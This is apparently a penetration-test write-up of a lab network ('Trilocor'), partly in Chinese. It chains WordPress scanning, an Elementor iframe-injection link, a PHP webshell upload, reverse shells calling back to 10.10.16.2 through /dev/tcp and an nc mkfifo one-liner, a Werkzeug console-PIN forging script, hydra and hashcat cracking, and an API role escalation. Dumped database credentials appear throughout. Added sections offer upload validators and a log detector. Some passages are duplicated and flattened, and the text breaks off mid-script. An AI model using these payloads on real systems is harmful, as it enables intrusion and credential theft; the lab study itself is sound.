 |   - http://www.trilocor.local/wp-content/plugins/elementor/assets/css/admin.min.css, Match: 'elementor - v3.5.3'

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:43 <=====================> (652 / 652) 100.00% Time: 00:00:43
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] astra
 | Location: http://www.trilocor.local/wp-content/themes/astra/
 | Latest Version: 4.8.10
 | Last Updated: 2025-01-07T00:00:00.000Z
 | Style URL: http://www.trilocor.local/wp-content/themes/astra/style.css
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Astra < 4.6.9 - Contributor+ Stored XSS
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpscan.com/vulnerability/62871f3a-c9a8-49bb-b67b-143af3caa986
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2347
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed914e67-4cf7-49b1-96be-ed8c604e6dce
 |
 | [!] Title: Astra < 4.6.5 - Editor+ Stored XSS via Theme Header/Footer
 |     Fixed in: 4.6.5
 |     References:
 |      - https://wpscan.com/vulnerability/30fd2612-91f6-4c1b-8d0c-fa607edf4717
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29768
 |      - https://patchstack.com/database/vulnerability/astra/wordpress-astra-theme-4-6-4-cross-site-scripting-xss-vulnerability
 |
 | The version could not be determined.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:47 <===================> (2575 / 2575) 100.00% Time: 00:02:47

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:09 <======================> (137 / 137) 100.00% Time: 00:00:09

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:05 <============================> (84 / 84) 100.00% Time: 00:00:05

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:06 <=================> (100 / 100) 100.00% Time: 00:00:06

[i] Medias(s) Identified:

[+] http://www.trilocor.local/?attachment_id=1
 | Found By: Attachment Brute Forcing (Aggressive Detection)

[+] http://www.trilocor.local/?attachment_id=2
 | Found By: Attachment Brute Forcing (Aggressive Detection)

<SNIP>

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06

[i] No Users Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Thu Jan 16 05:41:01 2025
[+] Requests Done: 3620
[+] Cached Requests: 17
[+] Data Sent: 859.696 KB
[+] Data Received: 3.706 MB
[+] Memory used: 325.613 MB
[+] Elapsed time: 00:04:22
```
WordPress plugin Elementor < 3.5.5 - Iframe Injection (CVE-2022-4953)

The installed Elementor is 3.5.3, so the iframe-injection entry from the wpscan output applies. The PoC is a crafted link whose fragment carries a base64-encoded lightbox settings object (here {"type":"video","url":"https://downloadmoreram.com/"}); whoever opens the link gets the attacker-chosen URL loaded in an iframe on the site's own page:

```
http://trilocor.local/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
```
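To make the PoC link legible, here is an added example (my code, not Elementor's and not from the original write-up) that builds and decodes an `elementor-action` fragment the way Elementor's front end reads it, shows the unchecked "any URL becomes the iframe src" behaviour that the wpscan entry describes, and puts a hardened check beside it. The `VIDEO_HOSTS` allow-list and the https-only rule are my assumptions about what a fix should enforce, not Elementor's actual patch; the payload is constructed, not captured from the target.

```python
#!/usr/bin/env python3
"""Build / decode an Elementor action fragment and vet the lightbox URL.

Added example, not Elementor's code. Elementor's front end reads
`#elementor-action:action=<name>&settings=<base64 JSON>` from the URL
fragment and, for action=lightbox with type "video", loads the decoded
`url` in an iframe. The hardened variant and its host allow-list are
assumptions about what a fix should enforce.
"""
import base64
import json
from urllib.parse import urlsplit

PREFIX = "elementor-action:"
# Assumed allow-list; adjust to the embed providers the site actually uses.
VIDEO_HOSTS = {"www.youtube.com", "youtube.com", "youtu.be",
               "player.vimeo.com", "vimeo.com"}


def make_fragment(action: str, settings: dict) -> str:
    """Build the fragment (without the leading '#') the way a crafted link would."""
    raw = json.dumps(settings, separators=(",", ":")).encode("utf-8")
    b64 = base64.b64encode(raw).decode("ascii")
    return f"{PREFIX}action={action}&settings={b64}"


def parse_elementor_action(fragment: str) -> dict:
    """Return {"action": str, "settings": dict} for an elementor-action fragment."""
    if fragment.startswith("#"):
        fragment = fragment[1:]
    if not fragment.startswith(PREFIX):
        raise ValueError("not an elementor-action fragment")
    params = {}
    for pair in fragment[len(PREFIX):].split("&"):
        key, _, value = pair.partition("=")   # base64 '=' padding stays in value
        params[key] = value
    settings = {}
    if params.get("settings"):
        raw = params["settings"]
        raw += "=" * (-len(raw) % 4)          # forgive stripped padding, as atob() does
        settings = json.loads(base64.b64decode(raw))
    if not isinstance(settings, dict):
        raise ValueError("settings must decode to a JSON object")
    return {"action": params.get("action", ""), "settings": settings}


def iframe_src_unchecked(settings: dict):
    """The vulnerable pattern: whatever url the fragment carries becomes the iframe src."""
    if settings.get("type") == "video" and settings.get("url"):
        return settings["url"]
    return None


def iframe_src_hardened(settings: dict, allow_hosts=VIDEO_HOSTS):
    """Hardened: https only and host pinned to known embed providers, else refuse."""
    url = iframe_src_unchecked(settings)
    if url is None:
        return None
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in allow_hosts:
        return None
    return url


if __name__ == "__main__":
    # Constructed payload with the same settings as the PoC link above.
    frag = make_fragment("lightbox", {"type": "video", "url": "https://downloadmoreram.com/"})
    action = parse_elementor_action(frag)
    print("fragment :", "#" + frag)
    print("decoded  :", action)
    print("unchecked:", iframe_src_unchecked(action["settings"]))
    print("hardened :", iframe_src_hardened(action["settings"]))
```

The point of the hardened variant is that the fragment never reaches the server (browsers do not send `#...`), so the check has to live in the front-end code that consumes `settings`; filtering on the server side cannot see this payload at all.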
```
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://www.trilocor.local:7777/FUZZ -fs 78

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://www.trilocor.local:7777/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 78
________________________________________________

                        [Status: 200, Size: 18473, Words: 3759, Lines: 837, Duration: 269ms]
console                 [Status: 200, Size: 1563, Words: 330, Lines: 46, Duration: 253ms]
:: Progress: [4614/4614] :: Job [1/1] :: 72 req/sec :: Duration: [0:01:06] :: Errors: 0 ::
```
URL/console
Once a shell on WEB-NIX01 has been obtained through the web vulnerability on uat01-eu.intranet.trilocor.local, this site can be attacked: the host-specific values the Werkzeug console PIN is derived from can be read directly from the box.
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-console-pin-exploit
1 2 3 4 5 6 7 8 9 websvc@WEB-NIX01:/home/websvc$ ls -l /usr/local/lib/ | grep python ls -l /usr/local/lib/ | grep python drwxrwsr-x 3 root staff 4096 Apr 23 2020 python3.8 websvc@WEB-NIX01:/home/websvc$ python3 -c 'import uuid; print(str(uuid.getnode()))' python3 -c 'import uuid; print(str(uuid.getnode()))' 67717014043514 websvc@WEB-NIX01:/home/websvc$ cat /etc/machine-id cat /etc/machine-id 49967d13a6e2400c9aa2ce8a2a217dbe
pin-poc.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import hashlibfrom itertools import chainprobably_public_bits = [ 'srvadm' , 'flask.app' , 'Flask' , '/usr/local/lib/python3.8/dist-packages/flask/app.py' ] private_bits = [ '67717014043514' , '49967d13a6e2400c9aa2ce8a2a217dbe' ] h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance (bit, str ): bit = bit.encode('utf-8' ) h.update(bit) h.update(b'cookiesalt' ) cookie_name = '__wzd' + h.hexdigest()[:20 ] num = None if num is None : h.update(b'pinsalt' ) num = ('%09d' % int (h.hexdigest(), 16 ))[:9 ] rv = None if rv is None : for group_size in 5 , 4 , 3 : if len (num) % group_size == 0 : rv = '-' .join(num[x:x + group_size].rjust(group_size, '0' ) for x in range (0 , len (num), group_size)) break else : rv = num print (rv)
1 2 $ python3.12 pin-poc.py 672-875-321
进入 Console 后,执行下方代码以拿到 Shell
1 __import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f').read();
blog.trilocor.local (Joomla 4.1.5)
URL/administrator
Exploitation with MSF
```
auxiliary/scanner/http/joomla_api_improper_access_checks
```
```
[+] Users JSON saved to /home/kali/.msf4/loot/20250116051138_default_10.129.170.214_joomla.users_996104.bin
[+] Joomla Users
============

 ID   Super User  Name           Username       Email                 Send Email  Register Date        Last Visit Date  Group Names
 --   ----------  ----           --------       -----                 ----------  -------------        ---------------  -----------
 543  *           Administrator  Administrator  admin@trilocor.local  1           2022-08-03 09:28:49                   Super Users

[+] Config JSON saved to /home/kali/.msf4/loot/20250116051139_default_10.129.170.214_joomla.config_788525.bin
[+] Joomla Config
=============

 Setting        Value
 -------        -----
 db encryption  0
 db host        172.18.0.11
 db name        joomla
 db password
 db prefix      org1j_
 db user        joomla
 dbtype         mysqli
```
careers.trilocor.local (login)
(failed)
```
hydra careers.trilocor.local -l admin -P /usr/share/wordlists/seclists/Passwords/darkweb2017-top10000.txt http-post-form "/index.php:username=^USER^&password=^PASS^:F=Error"
```
portal.trilocor.local (login)
pr.trilocor.local
remote.trilocor.local
store.trilocor.local
dev.trilocor.local
```
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://dev.trilocor.local/FUZZ

transfer                [Status: 200, Size: 87, Words: 4, Lines: 2, Duration: 268ms]
```
```
http://dev.trilocor.local/transfer -> http://securetransfer-dev.trilocor.local (add to /etc/hosts)
```
securetransfer-dev.trilocor.local
```
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://securetransfer-dev.trilocor.local/FUZZ -e .php -r -recursion -recursion-depth 2

conn.php                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 263ms]
download.php            [Status: 200, Size: 17, Words: 3, Lines: 1, Duration: 280ms]
files.php               [Status: 200, Size: 2967, Words: 810, Lines: 66, Duration: 274ms]
index.php               [Status: 200, Size: 2967, Words: 810, Lines: 66, Duration: 283ms]
static                  [Status: 200, Size: 1328, Words: 88, Lines: 19, Duration: 313ms]
storage                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 262ms]
upload.php              [Status: 200, Size: 2967, Words: 810, Lines: 66, Duration: 329ms]
```
File upload
Register an account
Upload a file
```http
POST /upload.php HTTP/1.1
Host: securetransfer-dev.trilocor.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------278895466837969786693227377055
Content-Length: 256
Origin: http://securetransfer-dev.trilocor.local
Connection: keep-alive
Referer: http://securetransfer-dev.trilocor.local/files.php
Cookie: PHPSESSID=efjlvn6ip46uataua8jn6nci3r

-----------------------------278895466837969786693227377055
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

<?php system($_REQUEST[1]);?>
-----------------------------278895466837969786693227377055--
```
Downloading this file redirects to the link http://securetransfer-dev.trilocor.local/download.php?file=6e0ec8be-c15e-4009-8871-358c4cc60d84
Testing for SQL injection with sqlmap
```
$ curl http://securetransfer-dev.trilocor.local/storage/2_6e0ec8be-c15e-4009-8871-358c4cc60d84.php\?1=hostname
c8601dccf970
```
c8601dccf970 (172.17.0.2)
Reverse Shell
```
curl http://securetransfer-dev.trilocor.local/storage/2_617c265c-fee3-4268-b58e-95724c23892d.php\?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.2%2F4444%200%3E%261%27
```
```
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.2] from (UNKNOWN) [10.129.170.214] 33922
www-data@c8601dccf970:/var/www/html/storage$ hostname
hostname
c8601dccf970
www-data@c8601dccf970:/var/www/html/storage$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 578418  bytes 143515071 (143.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 308284  bytes 169275041 (169.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 997893  bytes 87645713 (87.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 997893  bytes 87645713 (87.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

www-data@c8601dccf970:/var/www/html/storage$ cat /home/flag.txt
cat /home/flag.txt
4ef576b079b28810f1abd99783ca1eab
```
MySQL
Database credentials are found in /var/www/html/conn.php
```php
# conn.php
<?php
define('DB_SERVER', '127.0.0.1');
define('DB_USERNAME', 'securetransfer-db-admin');
define('DB_PASSWORD', '7dWo3i26ODc84kcA');
define('DB_NAME', 'securetransfer');

$conn = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
```
Connect to the database with the credentials (nothing of value inside)
```
www-data@c8601dccf970:/var/www/html/storage$ mysql -h 127.0.0.1 -u securetransfer-db-admin -p7dWo3i26ODc84kcA
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 52262
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| performance_schema |
| securetransfer     |
+--------------------+
3 rows in set (0.02 sec)

mysql> use securetransfer;
use securetransfer;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+--------------------------+
| Tables_in_securetransfer |
+--------------------------+
| files                    |
| users                    |
+--------------------------+
2 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+-----+------------+----------------------------------+----------------------+
| uid | user_login | user_pass                        | user_email           |
+-----+------------+----------------------------------+----------------------+
|   1 |            | d41d8cd98f00b204e9800998ecf8427e |                      |
|   2 | n2ryx      | 778b5bd4e356324db680c950b071833d | n2ryx@trilocor.local |
+-----+------------+----------------------------------+----------------------+
2 rows in set (0.00 sec)

mysql> select * from files
select * from files;
+-----+--------------------------------------+-----------+------------------------------------------------------------------+---------------------+--------+
| uid | uuid                                 | file_name | real_path                                                        | upload_date         | public |
+-----+--------------------------------------+-----------+------------------------------------------------------------------+---------------------+--------+
|   2 | 0900d99e-c949-4e89-8904-506626afb98a | 1.txt     | /var/www/html/storage/2_0900d99e-c949-4e89-8904-506626afb98a.txt | 2025-01-17 05:50:32 |      0 |
|   2 | 3773a32a-99a2-4bef-a5f8-557a3c5a5b3e | shell.php | /var/www/html/storage/2_3773a32a-99a2-4bef-a5f8-557a3c5a5b3e.php | 2025-01-17 05:05:47 |      0 |
|   2 | 617c265c-fee3-4268-b58e-95724c23892d | 1.php     | /var/www/html/storage/2_617c265c-fee3-4268-b58e-95724c23892d.php | 2025-01-17 05:29:07 |      0 |
|   2 | 88cb27ea-d1a7-4587-b6c7-919158fc8061 | shell.php | /var/www/html/storage/2_88cb27ea-d1a7-4587-b6c7-919158fc8061.php | 2025-01-17 06:54:11 |      0 |
+-----+--------------------------------------+-----------+------------------------------------------------------------------+---------------------+--------+
4 rows in set (0.00 sec)

mysql> quit
```
osTicket Administrator password
The file /apps/osticket_data.zip is found; copy it into the web directory and download it through the browser
```
www-data@c8601dccf970:/var/www/html/storage$ ls -al /apps
ls -al /apps
total 40
drwxr-xr-x 1 root root  4096 Aug 22  2022 .
drwxr-xr-x 1 root root  4096 Sep 14  2022 ..
-rw-r--r-- 1 root root 31062 Jul 21  2022 osticket_data.zip
www-data@c8601dccf970:/var/www/html/storage$ cp /apps/osticket_data.zip .
```
```
$ wget http://securetransfer-dev.trilocor.local/storage/osticket_data.zip
```
Unzip the archive and import config.sql; the administrator password hash is in the osticket.ost_staff table
```
Administrator
$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.
```
Crack it with hashcat
```
$ hashcat -m 3200 osticket.hash /usr/share/wordlists/rockyou.txt
<SNIP>
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.:administracion

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2...KyH88.
Time.Started.....: Sat Jan 18 03:56:35 2025 (1 min, 52 secs)
Time.Estimated...: Sat Jan 18 03:58:27 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      143 H/s (6.87ms) @ Accel:2 Loops:64 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 15916/14344385 (0.11%)
Rejected.........: 0/15916 (0.00%)
Restore.Point....: 15912/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:192-256
Candidate.Engine.: Device Generator
Candidates.#1....: ananas -> adambrody
Hardware.Mon.#1..: Util: 98%

Started: Sat Jan 18 03:56:31 2025
Stopped: Sat Jan 18 03:58:28 2025
```
osticketapp.trilocor.local
Log in to the osticketapp.trilocor.local admin panel with the recovered credentials
```
http://osticketapp.trilocor.local/scp/login.php
Administrator:administracion
```
A subdomain is found there
```
gogsusdev01.trilocor.local
```
gogsusdev01.trilocor.local
Another subdomain is found at http://gogsusdev01.trilocor.local/explore/repos
along with some markdown documents
uat01-eu.intranet.trilocor.local
Read the documents to continue the penetration test
API Abuse
Register
```http
POST /auth/login HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Content-Type: application/json
Content-Length: 78

{
    "username": "n2ryx",
    "password":"uat01-eu.intranet.trilocor.local"
}
```
Login, copy PHPSESSID
```http
POST /auth/login HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Content-Type: application/json
Content-Length: 78

{
    "username": "n2ryx",
    "password":"uat01-eu.intranet.trilocor.local"
}
```
Update, admin role
```http
POST /auth/update HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Cookie: PHPSESSID=329ct0vu5nooi97qb4pcfuljb1
Content-Type: application/json
Content-Length: 27

{
    "role": "admin"
}
```
Login, copy PHPSESSID again
```http
POST /auth/login HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Content-Type: application/json
Content-Length: 78

{
    "username": "n2ryx",
    "password":"uat01-eu.intranet.trilocor.local"
}
```
Add Support Ticket
```http
POST /support/add HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Cookie: PHPSESSID=59kg248kfdgb6b1pi6nd21rb8d
Content-Type: application/json
Content-Length: 51

{
    "ticket": "<?php system($_REQUEST[1]);?>"
}
```
List Tickets
```http
GET /support/list HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
User-Agent: curl/8.11.1
Accept: */*
Cookie: PHPSESSID=59kg248kfdgb6b1pi6nd21rb8d
Connection: keep-alive
```
Export Ticket to .json.php file
```http
POST /support/export/1 HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Cookie: PHPSESSID=59kg248kfdgb6b1pi6nd21rb8d
Content-Type: application/json
Content-Length: 21

{"type":"json.php"}
```
Webshell
```http
GET /exports/tickets_1_20250118145741_29ab7e67_682a_4930_9aaf_62370296ba50.json.php?1=hostname HTTP/1.1
Host: uat01-eu.intranet.trilocor.local
Cookie: PHPSESSID=k0256olikv98nqjdnishpk5ia0
```
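The three application bugs chained above share one root cause: the server trusts a client-supplied value that decides what lands on disk or in the session (the upload filename on securetransfer-dev, the export "type" on the intranet, and the "role" field on /auth/update). The following is an added example, not code from the lab or from either application, of the server-side checks that would have closed each of them; the allowlists, the `.bin` fallback and the function names are assumptions, while the `<uid>_<uuid>.<ext>` storage scheme is the one the writeup observed.

```python
"""Server-side validation for the three client-controlled values abused above.

Added example, not from the Trilocor lab or either application. The storage
naming scheme '<uid>_<uuid>.<ext>' mirrors what the writeup found in the
'files' table; the allowlists and role rule are constructed assumptions.
"""
import os
import re
import uuid

# Extensions the transfer service is willing to store under its web root.
# Anything else (php, phtml, htaccess, ...) is stored as .bin, so the web
# server never treats a user upload as executable code.
UPLOAD_ALLOWLIST = {"txt", "pdf", "png", "jpg", "jpeg", "zip"}

# Export formats the ticket exporter knows how to write.
EXPORT_FORMATS = {"json", "csv"}

# Roles the intranet recognises.
ROLES = {"user", "admin"}

_UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"
)
_STORED_RE = re.compile(r"^(\d+)_([0-9a-f-]{36})\.([a-z0-9]+)$")


def safe_storage_name(uid: int, original_name: str) -> str:
    """Return '<uid>_<uuid>.<ext>' with the extension forced onto the allowlist.

    Only the last dotted component of the client's filename is consulted, and
    only to pick the stored extension, so 'shell.php', 'notes.txt.php' and
    '../../x' all end up as '<uid>_<uuid>.bin'.
    """
    base = os.path.basename(original_name)  # drop any path components
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in UPLOAD_ALLOWLIST:
        ext = "bin"
    return f"{uid}_{uuid.uuid4()}.{ext}"


def is_safe_stored_name(name: str) -> bool:
    """Check that a name on disk follows the '<uid>_<uuid>.<allowed ext>' scheme."""
    m = _STORED_RE.match(name)
    if not m or not _UUID_RE.match(m.group(2)):
        return False
    return m.group(3) in UPLOAD_ALLOWLIST | {"bin"}


def validate_export_type(requested: str) -> str:
    """Map the client's 'type' value onto a known format or reject it.

    'json.php' is not on the allowlist, so the exporter can never be talked
    into writing 'tickets_<...>.json.php' into the web-served /exports tree.
    """
    fmt = requested.strip().lower()
    if fmt not in EXPORT_FORMATS:
        raise ValueError(f"unsupported export type: {requested!r}")
    return fmt


def apply_profile_update(current: dict, payload: dict,
                         caller_is_admin: bool) -> dict:
    """Apply a profile update while refusing mass-assigned privileged fields.

    'email' and 'display_name' are user-writable. A 'role' change is accepted
    only from an administrative caller and only for a known role, so a plain
    user posting {"role": "admin"} to /auth/update is rejected outright.
    """
    updated = dict(current)
    for field in ("email", "display_name"):
        if field in payload:
            updated[field] = str(payload[field])
    if "role" in payload:
        if not caller_is_admin or payload["role"] not in ROLES:
            raise PermissionError("role changes require an administrative caller")
        updated["role"] = payload["role"]
    return updated
```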
Internal Testing
Initial Access
WEB-NIX01 (websvc)
```
$ curl "http://uat01-eu.intranet.trilocor.local/exports/tickets_1_20250118145741_29ab7e67_682a_4930_9aaf_62370296ba50.json.php?1=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.2/4444+0>%261'"
```
```
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.2] from (UNKNOWN) [10.129.171.25] 59070
bash: cannot set terminal process group (1501): Inappropriate ioctl for device
bash: no job control in this shell
websvc@WEB-NIX01:/var/www/html/_intranet/exports$ python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=xterm
export TERM=xterm
$ hostname -I
hostname -I
10.129.171.25 172.16.139.10 172.17.0.1 172.18.0.1 dead:beef::250:56ff:fe94:e4da
$ cat /home/websvc/flag.txt
cat /home/websvc/flag.txt
59b18b704c1f0428357d89259045a829
```
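Both shells on this page were driven over plain HTTP GETs to a user-uploaded PHP file (`/storage/<uid>_<uuid>.php` on the transfer container and `/exports/*.json.php` on the intranet), which is what a web server's access log records. The detector below is an added example, not part of the writeup or either application; the access-log lines are constructed here from the paths the writeup used, and the path patterns and command wordlist are assumptions.

```python
"""Flag access-log requests to user-uploaded PHP in web-served upload trees.

Added example, not from the Trilocor lab or either application. SAMPLE_LOG is
constructed from the paths the writeup used; the patterns are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Web-reachable directories that should only ever serve inert user content.
SUSPECT_PATHS = (
    re.compile(r'^/storage/\d+_[0-9a-f-]{36}\.php$'),
    re.compile(r'^/exports/.+\.json\.php$'),
)

# Shell words seen in the writeup's command-over-query-string invocations.
SHELL_WORDS = re.compile(
    r'(?:^|[\s;|&\'"])(?:bash|sh|nc|mkfifo|hostname|whoami|id)\b|/dev/tcp/'
)


def classify(line: str):
    """Return an alert dict for a request that executes an uploaded PHP file."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not any(p.match(parts.path) for p in SUSPECT_PATHS):
        return None
    # parse_qs percent-decodes the values, so encoded shell syntax is visible.
    params = parse_qs(parts.query)
    args = " ".join(v for vals in params.values() for v in vals)
    severity = "high" if SHELL_WORDS.search(args) else "medium"
    return {"ip": m["ip"], "ts": m["ts"], "path": parts.path,
            "args": args, "severity": severity}


def scan(lines):
    """Run classify() over an iterable of log lines, keeping only alerts."""
    return [a for a in map(classify, lines) if a]


# Constructed sample log; the paths mirror the writeup, the rest is invented.
SAMPLE_LOG = [
    '10.10.16.2 - - [17/Jan/2025:05:30:02 +0000] "GET /storage/'
    '2_617c265c-fee3-4268-b58e-95724c23892d.php?1=hostname HTTP/1.1" '
    '200 13 "-" "curl/8.11.1"',
    '10.10.16.2 - - [17/Jan/2025:05:31:10 +0000] "GET /storage/'
    '2_617c265c-fee3-4268-b58e-95724c23892d.php?1=bash%20-c%20%27bash%20-i'
    '%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.2%2F4444%200%3E%261%27 HTTP/1.1" '
    '200 0 "-" "curl/8.11.1"',
    '192.168.1.20 - - [17/Jan/2025:05:50:40 +0000] "GET /storage/'
    '2_0900d99e-c949-4e89-8904-506626afb98a.txt HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '10.10.16.2 - - [18/Jan/2025:14:58:01 +0000] "GET /exports/tickets_1_'
    '20250118145741_29ab7e67_682a_4930_9aaf_62370296ba50.json.php?1=ls '
    'HTTP/1.1" 200 54 "-" "curl/8.11.1"',
    '192.168.1.21 - - [18/Jan/2025:14:59:30 +0000] "POST /support/export/1 '
    'HTTP/1.1" 200 21 "-" "curl/8.11.1"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["severity"], alert["ip"], alert["path"], repr(alert["args"]))
```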
WEB-NIX01 (srvadm)
With a shell on WEB-NIX01 obtained through the uat01-eu.intranet.trilocor.local web vulnerability, the Werkzeug application on port 7777 can now be attacked
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-console-pin-exploit
```
websvc@WEB-NIX01:/home/websvc$ ls -l /usr/local/lib/ | grep python
ls -l /usr/local/lib/ | grep python
drwxrwsr-x 3 root staff 4096 Apr 23  2020 python3.8
websvc@WEB-NIX01:/home/websvc$ python3 -c 'import uuid; print(str(uuid.getnode()))'
python3 -c 'import uuid; print(str(uuid.getnode()))'
67717014043514
websvc@WEB-NIX01:/home/websvc$ cat /etc/machine-id
cat /etc/machine-id
49967d13a6e2400c9aa2ce8a2a217dbe
```
pin-poc.py
```python
import hashlib
from itertools import chain

# username running the app, module name, app name, path to flask/app.py
probably_public_bits = [
    'srvadm',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.8/dist-packages/flask/app.py'
]

# MAC address as a decimal integer (uuid.getnode()) and /etc/machine-id
private_bits = [
    '67717014043514',
    '49967d13a6e2400c9aa2ce8a2a217dbe'
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

